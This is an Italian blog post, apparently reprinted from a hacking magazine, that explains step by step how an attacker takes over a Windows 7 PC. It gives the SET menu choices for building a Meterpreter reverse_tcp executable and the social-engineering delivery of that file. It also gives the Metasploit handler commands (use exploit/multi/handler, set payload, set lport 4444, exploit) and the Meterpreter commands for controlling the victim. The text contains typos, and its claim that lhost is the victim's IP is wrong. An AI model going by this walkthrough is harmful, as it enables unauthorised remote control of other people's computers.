SISTEMI OPERATIVI VULNERABILI.


SISTEMI OPERATIVI VULNERABILI
Le importazioni falle di sicurezza non ancora risolte negli OS più
diffusi consentono al pirata di intrufolarsi agevolmente nel nostro PC.


Abbiamo appena visto come al pirata basta un semplice comando per scoprire il
tipo di sistema operativo utilizzato dalla sua vittima. Ma per cosa gli servirà mai
saperlo? Ogni OS in circolazione, GNU-Linux incluso, ha i suoi punti deboli come ad
esempio eventuali porte lasciate aperte per assistenza remota o peggio ancora falle
di sicurezza non ancora risolte. Il numero di queste ultime è veramente alto e ciò 
è abbastanza preoccupante. Per quale motivo le software house non fanno qualcosa per
correggere questi bug di funzionamento? E rimarremo scioccati quando scopriremo che
lo stesso Windows 7, spacciato da Microsoft come sistema operativo sicuro, in realtà 
è bucabile in pochi minuti se non addirittura secondi. Ovviamente, però, è strettamente
necessaria la partecipazione della vittima: tramite la pratica del social engineering,
il pirata trasferisce un paylod nel sistema bersaglio, prendendone in definitiva il
pieno controllo. Per crearlo utilizza il software Set, nel quale il pirata si limita
alla semplice scelta di qualche opzione. La creazione del paylod è infatti del tutto
automatica ed il file eseguibile da trasferire sul PC della vittima viene restituito
nella directory /pentest/exploits/set. Analizziamo quondi ogni singola mossa compiuta
dal pirata.


TUTTO IN UN .EXE
Utilizzando Set, il pirata crea un paylod da utilizzare per accedere al PC della sua vittima.
AVVIO DE TOOL
A) Dopo aver avviato una nuova sessione del
Terminale, il pirata accede alla directory
pentest/exploits/set e lancia il comando .set
per avviare il software. Sceglie dunque l'opzione
4 per creare un paylod ed un listener da iniettare
poi nel PC della sua vittima.


B)OBIETTIVO WINDOWS
Supponendo che il pirata voglia colpire un PC
equipaggiato con Windows (quello rilevato in
precedenza da Nmap), il pirata digita 2 e conferma
con Invio per scegliere l'opzione Windows Reverse_TCP Meterpreter
(controllerà il PC vittima da terminale).


C)CREAZIONE BACKDOOR
Il pirata utilizza un file eseguibile che sfrutta una
backdoor attiva sul PC bersaglio. Digita quindi 16 e
conferma con Invio. Indica una porta di ascolto e preme 
nuovamente Invio. Attende dunque che l'.exe venga generato.








WINDOWS 7 BUCATO!
Creata la backdoor, il pirata riesce ad intrufolarsi nel PC della 
sua vittima e a controllarlo


A)IL FILE FONDAMENTALE
Utilizzando il file manager di BackTrack 5 R1,il
pirata raggiunge la directory set presente in 
pentest/exploits. Copia quindi il file msf.exe 
creato in precedenza e tramite pratiche di social
engineering(11) lo trasferisce sul PC della vittima
avviandolo.


B)METASPLOIT IN AZIONE
A questo punto il pirata avvia una nuova sessione
del Terminale e raggiunge il percorso /opt/frame
work/msf3. Da qui digita il comando ./msfconsole
per avviare il software Metasploit che utilizzerà
per controllare anche da remoto il sistema della 
sua vittima.


C)INDIRIZZO IP E PORTA
Il pirata lancia una serie di comandi: prima use
exploit/multi/handler e poi set paylod windows/
meterpreter/reverse_tcp. Indica l'indirizzo IP
della vittima con set lhost e la porta che ha configurato
in precedenza con set lport 4444.


D) TRAGUARDO RAGGIUNTO
Non gli resta che lanciare il comando exploit
ed attendere che la vittima avvii il file msf.exe
che il pirata ha trasferito in precedenza. Non appena
il pesce avrà abboccato, Metaploit restituirà un
messaggio di conferma ed avvierà il meterpreter
creato dal pirata.


E)NEL PC DELLA VITTIMA
Il pirata ha ora a disposizione una serie di comandi
che può utilizzare per controllare Windows 7 installato
nel PC del malcapitato. Per scoprirli digita help.
Per catturare ad esempio una schermata gli basta
semplicemente lanciare un comando screenshot.


F)PIENO CONTROLLO
Può inoltre avviare e gestire il Prompt dei comandi
di Windows digitando semplicemente execute-fcmd o
addirittura spegnere il PC della sua vittima lanciando
il comando shutdown. E non c'è antivirus o firewall
che tenga: anche Windows 7 è stato bucato.


Commenti

Post popolari in questo blog

INSTAFETCH - Android -

L'igiene dell'apparato scheletrico. Anatomia.

I pesci abissali. Zoologia marina.